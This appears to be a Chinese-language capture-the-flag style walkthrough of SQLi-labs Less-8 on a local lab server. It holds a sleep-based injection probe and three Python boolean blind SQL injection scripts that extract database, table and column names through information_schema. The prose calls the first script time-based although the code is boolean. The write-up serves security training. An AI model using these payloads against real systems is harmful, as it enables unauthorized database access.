首先盲注判断
?id=1' and sleep(2)--+
发现页面存在注点,使用时间盲注脚本进行注入
import requests
def inject_database(url):
name = ''
for i in range(1, 20): # 假设数据库名称长度不超过20
low = 48 # '0'
high = 122 # 'z'
middle = (low + high) // 2
while low < high:
payload = "1' and ascii(substr(database(),%d,1))>%d-- " % (i, middle)
params = {"id": payload}
r = requests.get(url, params=params)
# 判断注入是否成功,依据靶场的返回信息
if 'You are in' in r.text: # 只检查包含 "You are in" 的内容,表示成功
low = middle + 1
else:
high = middle
middle = (low + high) // 2
# 只拼接有效字符,跳过空格(ASCII 32)和其他非打印字符
if middle > 32: # 跳过空格和不可打印字符
name += chr(middle)
# 每次获取一个字符后打印当前的数据库名
print(f"Current database name: {name}")
# 重置 low 和 high 的值
low = 48
high = 122
middle = (low + high) // 2
print(f"Final database name: {name}")
if __name__ == "__main__":
url = "http://127.0.0.1/sqlilabs7/Less-8/index.php"
inject_database(url)
成功注入出了数据库名,
再更换payload和部分函数代码注入表和列
import requests
def inject_table_name(url, database_name):
table_name = ''
for i in range(1, 20): # 假设表名长度不超过20
low = 48 # '0'
high = 122 # 'z'
middle = (low + high) // 2
while low < high:
# 构造布尔盲注的 payload
payload = f"1' and ascii(substr((select table_name from information_schema.tables where table_schema='{database_name}' limit 0,1),{i},1))>{middle}-- "
params = {"id": payload}
r = requests.get(url, params=params)
# 判断注入是否成功,依据靶场的返回信息
if 'You are in' in r.text: # 只检查包含 "You are in" 的内容,表示成功
low = middle + 1
else:
high = middle
middle = (low + high) // 2
# 只拼接有效字符,跳过空格(ASCII 32)和其他非打印字符
if middle > 32: # 跳过空格和不可打印字符
table_name += chr(middle)
# 每次获取一个字符后打印当前的表名
print(table_name)
# 重置 low 和 high 的值
low = 48
high = 122
middle = (low + high) // 2
print(f"Final table name: {table_name}")
if __name__ == "__main__":
url = "http://127.0.0.1/sqlilabs7/Less-8/index.php"
database_name = "security" # 目标数据库名称
inject_table_name(url, database_name)
列名注入
import requests
def inject_column_name(url, database_name, table_name):
column_name = ''
for i in range(1, 20): # 假设列名长度不超过20
low = 48 # '0'
high = 122 # 'z'
middle = (low + high) // 2
while low < high:
# 构造布尔盲注的 payload
payload = f"1' and ascii(substr((select column_name from information_schema.columns where table_schema='{database_name}' and table_name='{table_name}' limit 0,1),{i},1))>{middle}-- "
params = {"id": payload}
r = requests.get(url, params=params)
# 判断注入是否成功,依据靶场的返回信息
if 'You are in' in r.text: # 只检查包含 "You are in" 的内容,表示成功
low = middle + 1
else:
high = middle
middle = (low + high) // 2
# 只拼接有效字符,跳过空格(ASCII 32)和其他非打印字符
if middle > 32: # 跳过空格和不可打印字符
column_name += chr(middle)
# 每次获取一个字符后打印当前的列名
print(column_name)
# 重置 low 和 high 的值
low = 48
high = 122
middle = (low + high) // 2
print(f"Final column name: {column_name}")
if __name__ == "__main__":
url = "http://127.0.0.1/sqlilabs7/Less-8/index.php"
database_name = "security" # 目标数据库名称
table_name = "users" # 目标表名
inject_column_name(url, database_name, table_name)
